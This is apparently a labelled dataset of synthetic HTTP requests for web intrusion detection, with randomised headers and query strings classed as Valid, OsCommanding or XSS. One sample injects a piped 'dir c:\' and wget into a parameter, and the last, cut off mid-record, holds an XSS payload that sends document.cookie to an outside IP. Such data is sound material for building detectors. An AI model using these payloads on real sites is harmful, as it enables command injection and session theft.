If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Tue, 24 Apr 07 13:47:50 GMT
If-Match: *
If-None-Match: "kzc8V9ZPhHF2AyTxL"
If-Range: Sun, 09 Jul 06 21:13:59 GMT
Max-Forwards: 64
MIME-Version: 4.7
Pragma: ojrit=ntlh
Proxy-Authorization: Basic ZGk5b2g6bmZpcmU3
Authorization: maessy sOhmS=idhnenqn
Range: 8-29969,-67,432-912142
Referer: http://www.leftgn.org/yFFth/cmuL/tltiDo.aspx
TE: deflate
Trailer: Via
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 4.6; ms-de; rv:3.8.3) Gecko/42456620
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: 2.2 197.154.157.20
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 330 www.aiew2aRa.jpg "huTweibwmAEeQpte" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37101
Start - Id: 18879
class: Valid
GET /i6sCrQ.L5D7Hx/hPZqcRoIF7/yr0BwEsn0u/sqp.VU0U-2Ge/nraTXo21ntlai/p_@tD@b1S1YRXd-oEpzI/ufGXg.gb22.dJ/ne1dntu.htm?al1eNaosa=U%2Fl+rl0nso&aosloeZ4oe=r HTTP/1.0
Host: www.saN0fj.be
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 100.195.49.71
Cookie: aspe5=26;JWgsGE=stdwy
Cookie2: $Version="9"
Date: Sun, 12 Aug 07 14:55:16 GMT
ETag: W/"pocZuN7RKbjXwg6Osjsu"
Expect: fheib7
From: jontegt@8eoi1ys.fr
If-Modified-Since: Sun, 10 Jan 10 02:00:04 GMT
If-Unmodified-Since: Wed, 20 Aug 08 19:33:46 CET
If-Match: *
If-None-Match: "oR5P9RkOIGa_DRiot"
If-Range: Thu, 07 Apr 05 24:27:15 UTC
Max-Forwards: 770
MIME-Version: 2.6
Pragma: MNbdwe=60
Proxy-Authorization: NTLM b2hkbGxzN2lvUmNmQWFsM2VvYXdMbnJmQWltYWV0aGw=
Authorization: Basic cnl0d3I6ZWVpZWk=
Range: -47,36391-88404,16-
Referer: /hieiVnss.wmn
TE: gzip
Trailer: Referer
User-Agent: Mozilla/8.5 (X11; U; Linux i586 1.0; Oo-au; rv:5.7.4) Gecko/00384917
UA-CPU: StrongARM
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 592x5506
Via: scs/0.4 155.247.204.218
Transfer-Encoding: compress
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 798 www.cettD.jpeg "ieNr0" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 40451880140353665306
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18879
Start - Id: 20574
class: Valid
GET /Sako0457xp_/sEy0ehh1/tobep/yf0JD@NwS/enpm3f/my/hvN@jFoDyolJtJ.nsf?hea7feotmenai=7&etctstoldr=2821511 HTTP/1.1
Host: 40.77.252.151
Connection: uorsoAd
Accept: video/mpeg;q=0.4, application/*, application/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=8918
Client-ip: 52.220.18.61
Cookie: snnpeiectoaegrb=ns';y9m6n0rls=dut ee5lh+;DZQ5iframeQ5p=lesdQnd;rbrpsO=6869;huRcsoTenokngn=cx
Cookie2: $Version="4"
Date: Tue, 28 Apr 09 18:37:42 CET
ETag: "QmHQhToXdBnV4jaKkq1"
Expect: ruigm0oi=yotntt;wytfaT=Fef6e
From: po0uCr@azOlx3ayBy.org
If-Modified-Since: Fri, 28 Jan 05 05:50:49 GMT
If-Unmodified-Since: Sun, 17 May 09 08:26:27 CET
If-Match: "WVfD5XnkSYiBdMepF42"
If-None-Match: *
If-Range: Mon, 14 Mar 05 04:43:01 GMT
Max-Forwards: 42
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM ZGlpZWtlaWFhdG5vbHJpaWU3dHNxc2xkNGVhd210Z0VpZmlzYWV3dHd1bm5u
Authorization: Basic aHRic29obmU6ZXI4aA==
Range: 852875-5353
Referer: /e75mcl.pl
TE: deflate;q=0.2
Trailer: Host
User-Agent: Mozilla/7.0 (compatible; Konqueror/2.5; WinNT; nda6zfett; ihn3; iteihea)
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1074x5578
Via: FTP/3.7 202.186.195.234
Transfer-Encoding: identity
Upgrade: 1bh2nl/0.8, aHt/2.8
Warning: 257 13.243.249.249 "3a9dtgni" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20574
Start - Id: 30864
class: Valid
GET /zN1zx5x/ascw/mltmdmerefaeT/aBxVtgyy/e0a-QYLYMechoztqX/Pf_QNco.vA6m/j9mSDLmwadEii5bm5P29.png?ett=085350669&TsS-=enARt5W20&5httpThavingTbgsound3b=6&2.igroup byg=eTcehttseas&ztosg=o.Q&ti8cWk=157727&wkiyyoyautv3=lJLn0pU&W1e@Io=a+akaetOma+vbscript&FkorC=e-6ggR3PKvU HTTP/1.1
Host: www.tnnT.uk
Connection: f47tSlal
Accept: video/quicktime;q=0.9, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 180.77.147.17
Cookie: ied=ume yscript9nn>inR6 brM<;DMIGlaN=097;xidN=huiaj
Cookie2: $Version="3"
Date: Thu, 26 Jan 06 20:59:42 GMT
ETag: "Z6pfhZSx39qSqs5"
Expect: 100-continue
From: uqfre@ho0adaw.st
If-Modified-Since: Thu, 31 Mar 05 01:18:50 GMT
If-Unmodified-Since: Sat, 07 Jun 08 20:11:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0268
MIME-Version: 2.6
Pragma: erzoaodw=57teto
Proxy-Authorization: NTLM ZW1taGhndG8wSmVuZVdvem9lZUF6aGNkcmpudDlObm5hNWVybnNubnRu
Authorization: NTLM ZWlpMXR0N2RjaXJpOUhaSWVvY253dHFpb2Vyb3U5ZGdrbUg=
Range: -2
Referer: http://www.6xf8.it/ihxne0/o1sdgTs/w8rh/xtaai/nmeag.zip
TE: gzip;q=0.1
Trailer: Accept-Charset
User-Agent: om306XJ4 http://www.ltedtn.fr
UA-CPU: StrongARM
UA-Disp: 072,6639,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1014x4541
Via: 7.3 52.37.194.171:8625, 0.4 www.mnxytBam.png, 4.7 132.179.177.122:7
Transfer-Encoding: gzip
Upgrade: eaWbo/6.9, earu/5.0
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 5586644742
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30864
Start - Id: 7636
class: Valid
POST /acULgEQ5Qk/Ean1inncng8/euhThfdcn4/xOuJvoCFt9j.dll? HTTP/1.1
Content-Length: 142
Content-Language: 6Iet9e1,spuh
Content-Encoding: compress
Content-Location: /iefh/e3eeAmo/boNox/teoppdz.tiff
Content-MD5: ZXVkYW5taDV3aGZ0U29pdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Mar 05 19:19:36 UTC
Last-Modified: Wed, 02 Nov 05 23:29:38 GMT
Host: 217.34.115.114:80
Connection: close
Accept: text/plain;q=0.7, image/png, text/plain
Accept-Charset: iso-8859-3, x-mac-icelandic;q=0.8, x-mac-hebrew;q=0.0, x-mac-greek
Accept-Encoding: 
Accept-Language: eecqp-uee5Mb;q=0.1, r-kDgdt;q=0.8, Nb-X3hoa;q=0.1, k-ERrs;q=0.8
Cache-Control: i5e=pt
Client-ip: 227.168.88.151
Cookie: Eaenf5k1ief6=0671
Cookie2: $Version="03"
Date: Mon, 12 Jun 06 16:01:07 UTC
ETag: "sTrqN8Gk8OsLTPg"
Expect: 100-continue
From: NSco@ktL8w.de
If-Modified-Since: Sun, 23 Jul 06 13:16:18 UTC
If-Unmodified-Since: Thu, 03 Feb 05 18:21:13 GMT
If-Match: "NJIkJM@vJwSacqy"
If-None-Match: *
If-Range: Sun, 12 Jun 05 05:07:07 CET
Max-Forwards: 32
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Basic cjYzcGpzcnM6bGVzZQ==
Authorization: ocbee bwr1e=e5tR
Range: 1034-
Referer: http://www.tw2n.uk/ltqi/uenEeu/gtti.pdf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: pUyJAX http://www.etch.st
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 045x2419
Via: 9.1 www.lbs0t.jpeg:40, FTP/1.6 www.wtei.css
Transfer-Encoding: gzip
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 59.74.190.194
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

ns=6808&ui3ge=080&m0ams48= &jxUawXe=r%u30@&hirnigyet=pwoy3vi0nsEslnmY8&eo=wohng&edEsnrear5h=|tx:aSoE74m&JtmpD7mAX=nph-)scslbodys-bin

End - Id: 7636
Start - Id: 17667
class: Valid
GET /aAJ-uL/O2lBeUZg1dhttps/Zw1/deXKM3FXrjnQdW/npgy-OsZDWqnXy/gu.6m1e7KQmD5/deO/b0.exe?8KyW=sRWX.OsCUS&ua3ahI=7eapwos&j4Mhfa=asform&ehNtaale4=ahaiEoa97pindwe&ai5tg7h0vos=+d&twlwveenep6=05471244 HTTP/1.1
Host: www.rwajn.st:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, compress;q=0.3, identity, identity, identity;q=0.2
Accept-Language: i-ed5de;q=0.7, ei-taemI;q=0.3, oP-i, WBn8r9La-drenh;q=0.1
Cache-Control: zs=imetsys
Client-ip: 230.206.198.120
Cookie: 8toS3aEs5ecd=n%m etc%
Cookie2: $Version="003"
Date: Wed, 18 Aug 04 10:43:59 CET
ETag: "w3D25KVVt4PU3k45y0kF"
Expect: 100-continue
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 18 Mar 08 04:28:52 GMT
If-Unmodified-Since: Sat, 27 Sep 08 06:02:35 GMT
If-Match: "j3lRtEQ3XV6r@ZLqAGu"
If-None-Match: "1b8yu6nyZDFSsYL4"
If-Range: Sat, 30 Apr 05 05:09:57 CET
Max-Forwards: 07
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: naEsom epan=kt4tmtNl
Authorization: eihw 0erb=eebdTn
Range: 7-,-84952
Referer: /vteePe/ehfSner/MDaqzio/pssl.php
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.9 (compatible; Konqueror/4.1; WinNT; eesner; dTjwi)
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 813x197
Via: njl/2.1 www.Llhti9L.gif, 7.9 32.243.35.95:4, 8.5 www.sthngt.tiff
Transfer-Encoding: E8ese; smln5ei=z5R8lv
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 288 51.112.234.217 "feiedSegcNUchAneon2h" "Thu, 19 Feb 09 11:59:33 UTC"
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 17667
Start - Id: 42850
class: OsCommanding
GET /eKl.@N.js?evpiec=691&o2gia=acaconnect4&rEqubchsmlleht=+ssh&oiteaftsToiwre=tr&DZWAfYf.T=Ah+b8Ko3e%40i&tro=rdihat&winntcmdamailnEi9Te=ecrtwgetYi%25%7Ea6ohq&nst=44.225.165.193+++%7C++dir%2Bc%3A%5C&ni3tabplltc=f%2F+t&orsottnErct=WesjE HTTP/1.0
Host: 102.241.119.13
Connection: sioaaost
Accept: text/html;q=0.4, text/plain;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: f6s=madro
Client-ip: 143.230.118.47
Cookie: 8AOopenaphpm89=(uthc wt3I4e;IkUgklU0=1;hh7s8=tLc;bdntnoen8cigs6e=28;pasze6thgnewns=948383
Cookie2: $Version="840"
Date: Fri, 05 Nov 04 18:35:57 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Sun, 02 Aug 09 08:17:36 CET
If-Match: "fkLSiJSki10kEDYFuWrs"
If-None-Match: "B7pQwDm1F4pO2GS71Eqe"
If-Range: "ZiEy-bnA8m1M4OmNB"
Max-Forwards: 1448
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: NTLM aG5pYWJweThjaXVnaWx5eW4zcmxoeG5ycnJ6ZXVzZDlvZ2V3ZW5laW1jMW5qbg==
Range: -885,-18051
Referer: http://trthN.gov/mYxt7en/EriExoal/asheifd.asp
TE: trailers,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.7 (X11; U; Open BSD i386 6.3; tr-hn; rv:8.4.6) Gecko/16549568
UA-CPU: Sparc
UA-Disp: 7817,3346,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 625x3364
Via: FTP/7.3 www.onsrvbas.css, dmbi/0.3 205.62.119.228, FTP/9.8 www.2sg8sjo.html
Transfer-Encoding: ehlbn8
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42850
Start - Id: 19311
class: Valid
GET /ar8.HdD/liAvI/4mPoASSrgA31wEW5/oi4etrr1noeaih/n.s01kkkS/ps4catlq4rt5j/o4mbCR/l9piSivj5/ee4iOAz22taah/5updatet.6BiB0perl/nnEesshNhspfrmenj.jpeg?lrbehk=-o&7XPXA3wjM-S=0dtrtdiwx&0I19cmOrcpIhR=%27msn%40ewdivTnuEt%5B%27pn&t.TQ=0646&smnn=066&eNefntlulunm9=DtjMdnon&Htswoc=387&Ra=neoopHrpe%2Fn5ea&mI-1Bhttps=rh0rfms&36SncCjnzTKx=wgetNkeb&R3betweenv=sUia3yIfheimhhxn HTTP/1.0
Host: www.Hduwkeel.st
Connection: weecon
Accept: text/xml, image/*;q=0.5, video/mpeg;q=0.7
Accept-Charset: windows-1250, windows-1257;q=0.5, windows-1255, euc-tw
Accept-Encoding: 
Accept-Language: il39nrsm-a, oisoTit-mCldvm0;q=0.8, titk-tD;q=0.0, rn-iv;q=0.3
Cache-Control: only-if-cached
Client-ip: 104.89.52.160
Cookie: fokfyzig=95449048;goRoa2=4369759;c-hh.aSC4W2=e 0s;ha=Kpsltt
Cookie2: $Version="298"
Date: Tue, 06 Jan 09 20:54:47 UTC
ETag: W/"ugn7N9MBSBO5p9A"
Expect: kodhya=rrn5e5w;lceinc5I
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 14 Aug 07 17:33:13 UTC
If-Unmodified-Since: Tue, 07 Jun 05 01:32:46 UTC
If-Match: *
If-None-Match: "PvGGV6baLbIPXEEz81U"
If-Range: *
Max-Forwards: 484
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic aW9EbTNpMjp0cnVwZQ==
Authorization: tegeid as1hgsn=tydaal
Range: 4-457,-32
Referer: http://IpiT.uk/is8hdruo/D05ai.js
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.5 (X11; U; Unix 8.1; bs-tz; rv:3.4.9) Gecko/38884890
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 061x5553
Via: 8.7 www.rwcsi.html, HTTP/0.8 www.7aeriuc.png:02
Transfer-Encoding: identity
Upgrade: sahcq/0.1
Warning: 003 128.98.138.220 "3eksueehheofe0cf" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19311
Start - Id: 27439
class: Valid
GET /Ch@orLrvJGaRo/lcaiu4ne.gif?0heooesaOBe=binzs&toavimbgbx=9OvBG17q.L&NR5gjMX5CFf=61754&WP.insertWdeletebinO=mtn&aDexdsr=de&a02kd9km=0hy3u%40dCHL&ond=eZyPA&2eopm=089324&oi3q5ipteewr=468869 HTTP/1.1
Host: www.pne3szit.st
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312;q=0.0, utf-7, iso-8859-15, iso-2022-jp, x-mac-korean
Accept-Encoding: 
Accept-Language: edm-e
Cache-Control: max-stale=56669
Client-ip: 68.6.127.94
Cookie: stdrrvp0ilizl=f\hGstyle'e;piLgii=eEZcqLkY;Hlgp=trt;rrTfai4aEs=4693;Sr=trn;Nkte=5i
Cookie2: $Version="3"
Date: Thu, 02 Jun 05 14:20:22 GMT
ETag: "TxkeDqa15iDuNrb0yk"
Expect: 100-continue
From: mkpuh@Norr.org
If-Modified-Since: Wed, 08 Jun 05 11:06:39 UTC
If-Unmodified-Since: Sun, 04 Feb 07 15:34:51 UTC
If-Match: "O.bLz4ZWUQp4YgndSBT8"
If-None-Match: "gmXzsV7feEKbufNeY"
If-Range: "sedKnLxMO4KiBtZNLMi"
Max-Forwards: 7319
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic b2FUczpOYWJzRWNu
Range: 72-
Referer: http://www.Ih7t.net/snspu.cgi
TE: trailers
Trailer: If-Modified-Since
User-Agent: aotwafUet (eL9G1M6Yx; wUqa03U)
UA-CPU: MIPS
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 759x1141
Via: 5.6 www.hnn7r.jpeg, neds/1.9 119.83.65.42:5721, 1.3 www.elLha.css
Transfer-Encoding: gzip
Upgrade: aof/7.7, e9Azie/5.3, isosn/8.8
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 4957101
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27439
Start - Id: 34087
class: Valid
PUT /eohwIhrcaexvuq/oILcoIcv7/M5QfY/szs/nuXUqeaHQ2lDmDuM/6irBaV09A6MKvR/6PBfVadToYK.sP/oi/tfwyZY@-A.50.sh? HTTP/1.0
Content-Length: 267
Content-Language: eet
Content-Encoding: gzip
Content-Location: /mhoiabhl/R5n2tni/4edwr/tryRx/Eutf.tiff
Content-MD5: aHQ5bmE5Zjczb0VhZTVvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jul 06 14:36:36 GMT
Last-Modified: Mon, 10 Dec 07 17:49:50 UTC
Host: www.eareo.org
Connection: close
Accept: application/*, text/xml;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: ljh-seonaseb;q=0.5, w-a;q=0.7
Cache-Control: max-age=1481
Client-ip: 14.88.248.198
Cookie: YIandLfQZk_t=sa;OtrkhAZwtdvwN=ceOaktxuibsea5in;asrekoiNyn9To=or;thyi=n8CWu9uxRc;m2VWb=3759
Cookie2: $Version="88"
Date: Sun, 17 May 09 17:19:45 GMT
ETag: "68.EgBHVN8vYCwiBUz"
Expect: 100-continue
From: 2s3rpd@N8dboRb.biz
If-Modified-Since: Thu, 29 Jul 04 10:58:45 GMT
If-Unmodified-Since: Sun, 22 Jan 06 22:37:41 UTC
If-Match: "lPObnr8Vz90qDEOA8io"
If-None-Match: "8EObg29Jv7lpJjDek"
If-Range: "zpUw2nm55HFspUn"
Max-Forwards: 360
MIME-Version: 9.8
Pragma: yb='ite2il'
Proxy-Authorization: NTLM OWxvcmZmaGJxYm9yYWF3d3lvQTR0ZmVwYW1hNm1rcHl0dmFlaHJ3YmlsY3luc212
Authorization: Digest opaque="i0nienr"
Range: 0159-
Referer: /ybeasgr/ulstdt9/h8ni.aspx
TE: trailers,deflate;q=0.2
Trailer: Accept-Charset
User-Agent: Mozilla/2.8 (compatible; Konqueror/7.6; Solaris; n6iehc; kshhoen)
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7731x678
Via: 3.9 www.9inEs.css:5281, HTTP/1.1 199.30.105.136, 3.2 www.eas6Nf.tiff:3696
Transfer-Encoding: compress
Upgrade: rl7oi/4.1, tfeG/2.3, Est/0.8, rs7t/5.9
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 155066
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

tn9adtlOz=chnGeafneauohuxs&nrtlncl6ojrets=emocha&e(ncta1bupdategroup bymsautoexectph&er6i0ar=ea&ee=8411241694&m8O2nqai3=65996&L@e0BhN=hnD9phbO_Gj-&nweena9pdnanee=e_1FJrXL&mca2=9sxNcbN16&7_g9jT6varKfXscript=8690351407&Mzlsp_qF8=ibsfh;passwd (inputtyh;ssexeca

End - Id: 34087
Start - Id: 21864
class: Valid
GET /03WQHAhkUAiits84/LahIn/991s/gtoeox/lrhf/t43alg/o..i/fPuA/aTiEvJjFnD/p4-uuSP.aspx? HTTP/1.0
Host: www.ytspm.org
Connection: iy6tLtn
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 127.36.79.82
Cookie: 3ICCHW2C=5989803;etdnn3hqhee9rw=99adiunltte8e;nhbWatllcloi=133770667;Kpza6xwPYC=i>< linkY a
Cookie2: $Version="1"
Date: Thu, 19 Apr 07 24:18:00 UTC
ETag: "_oWm6wFQ0bxMU5_"
Expect: 100-continue
From: iese@tecT.fr
If-Modified-Since: Wed, 11 May 05 20:18:08 GMT
If-Unmodified-Since: Sun, 05 Sep 04 23:47:22 CET
If-Match: "E3B7QlslGf7mapE"
If-None-Match: *
If-Range: "5kgnz27d5AoRuhq"
Max-Forwards: 6
MIME-Version: 2.2
Pragma: dneu=ter
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: Basic b1Jub0xzOjZ2cmE=
Range: 127-,459-41979
Referer: /ueRdPglM/eeotdsh/andsseo.php3
TE: trailers,gzip;q=0.7,trailers
Trailer: Connection
User-Agent: ehwocuucml/2.6.7.7.7
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5382x0739
Via: FTP/8.2 237.159.55.249:0
Transfer-Encoding: gzip
Upgrade: ehlec4/7.5, etieo/5.3, 3cri9/3.1, neAm/6.9, neum/3.4
Warning: 312 www.ln8onMov.shtml "tEn0djA" 
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21864
Start - Id: 11394
class: Valid
GET /cpta.jsp? HTTP/1.0
Host: www.oeale.cz
Connection: sqTxeui
Accept: image/*, application/*;q=0.6
Accept-Charset: hz-gb-2312;q=0.6, x-mac-roman;q=0.4, iso-8859-4;q=0.2, windows-1258, iso-8859-8-i
Accept-Encoding: 
Accept-Language: e3snio-lg, 2-hreo2ua;q=0.9
Cache-Control: tofeeo='rh'
Client-ip: 210.70.209.242
Cookie: 9ac5o3Y=eiK3QqwZow;1otree=8adQAq
Cookie2: $Version="2"
Date: Mon, 21 Nov 05 12:56:09 UTC
ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: diCxno
From: snso@neess.uk
If-Modified-Since: Sat, 13 Jan 07 18:10:35 UTC
If-Unmodified-Since: Thu, 14 Jun 07 01:31:27 UTC
If-Match: *
If-None-Match: *
If-Range: "ZAM2@sdbX4mtPQRkvl"
Max-Forwards: 3
MIME-Version: 4.6
Pragma: ncvanUe='ie'
Proxy-Authorization: NTLM dHN0TGN4NmVua2VzZGh4d3luZnJjM01TZnc4Tk51VGV6WmpubGVz
Authorization: NTLM MG9hRXd5ZWx4b1NDa1EwaGlpZWVsbm13T05manNnbmVlbml2ejNraHpseHNybmc=
Range: 53554-,0954-67,-51599
Referer: /tsxSt/lthme1/0eice/rheto8ns.pl
TE: deflate;q=0.4,trailers
Trailer: Accept-Language
User-Agent: fdos (aGq5wIg3; pyaWJT; duIq7L8; czgxB3GP)
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7012x529
Via: 9.9 www.no2tk.css, 8.1 50.118.156.98:9147
Transfer-Encoding: gzip
Upgrade: FyyeaN/5.3, G42/8.9, esemRu/3.3, eet/5.0
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 99503371855760774661
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11394
Start - Id: 24188
class: Valid
GET /lPGbyJ/D@l@CB5libY16HiQ/JYkt7WxLI95/dY1-NaG3KGHUxVbSW/srsahln6EUmoslbl/feabAsN/ev4jl/tinia/ttoPtcotmaxzeu/le5adart.php? HTTP/1.0
Host: 121.49.166.75
Connection: keep-alive
Accept: image/*;q=0.7, image/*;q=0.8
Accept-Charset: windows-1254, koi8, windows-1252;q=0.8, iso-8859-8-i;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=34209
Client-ip: 240.233.81.94
Cookie: an0Sa6=kM5;rlxoioau=837873330
Cookie2: $Version="38"
Date: Tue, 15 Nov 05 04:27:33 UTC
ETag: W/"Im8RvswVer9nk7sM"
Expect: syl4eApn
From: vktxen@eejuti.biz
If-Modified-Since: Wed, 28 Sep 05 06:46:55 CET
If-Unmodified-Since: Sat, 25 Apr 09 02:09:05 UTC
If-Match: "XHN4SJEyn4_347tJ5"
If-None-Match: "NbrhaBhf1ATLsUpa"
If-Range: Sun, 10 May 09 02:00:08 CET
Max-Forwards: 5497
MIME-Version: 1.4
Pragma: mtwSots7=cT
Proxy-Authorization: tiea eyfn=erdlElt
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: /dedaNr/1oque/lsi0o/sytsue.png
TE: trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/3.6 (compatible; MSIE 2.9; Win98; ya3utubx; eahwosn)
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x070
Via: 8.7 www.Oatunu.tiff
Transfer-Encoding: gzip
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 211.126.227.104
X-Serial-Number: 53913
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24188
Start - Id: 47779
class: XSS
GET /iorrmdeInpottl/Ri/qa46lC8eHrjt8Dy/htpassZYlmwheretz/7ierlRdar5xFu9tuNUu/vw2srvintTaiyhlrdO/uerAtwtpb/9@75kyjsBuCm8Qn/sco.htm?bilehvyt=2&dhblaeeand=gidl0nSt0hdtmt&7vbscriptGJblTqk4w=mmb478jAVKJ&ltdh=m5CHMr&0oulsZ=%3Cimg+++src%3D++++%22++++javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F252.68.192.186%2Fvetoil.mdb%27%2Bdocument.cookie%29%3B%5D++++%22+++%3E&aiwSsmz4c=gLn1nsaroovscc&2eonnos=ewdegoeiRdd51loOE&rtT=i%2Fmu&eafneo1iFitDgri=t3&iioisRaea0q=%28tOa%3Dh&@Ir7-Mcmd=passthrulanl%7CMzeincludedlocationza&moaha0ilaii=lib9ams%28n%5C7d HTTP/1.1
Host: www.stns.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: mesxa-wren0eYr, p-etLns4e, tGO0-se
Cache-Control: auksx=a4
Client-ip: 225.168.147.79
Cookie: rEngrlqaoanEte=I7i5w;dnais3r8C0isd=718475645;mti9itog7=servicesoptssami7al@tecopyue&feA
Cookie2: $Version="49"
Date: Sat, 01 Sep 07 06:19:06 UTC
ETag: W/"llM-xJQU9H5XeIPnwx"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Fri, 02 Sep 05 23:28:25 UTC
If-Unmodified-Since: Thu, 03 Dec 09 20:04:53 GMT
If-Match: "RoRP6P46gnywWNY.S"
If-None-Match: *
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 4
MIME-Version: 9.4
Pragma: t7=x7
Proxy-Authorization: ynhmte fnet1=f4tno
Authorization: Digest nonce
Range: 2672-661117
Referer: http://www.3elOa2.st/rf9f.png
TE: deflate;q=0.1,trailers,trailers
